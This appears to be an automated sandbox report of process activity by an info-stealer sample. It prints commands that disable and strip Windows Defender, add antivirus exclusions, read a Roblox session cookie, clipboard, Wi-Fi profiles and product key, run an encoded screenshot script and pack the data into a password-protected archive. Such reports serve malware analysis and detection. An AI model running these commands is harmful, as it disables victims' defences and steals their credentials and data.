Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauw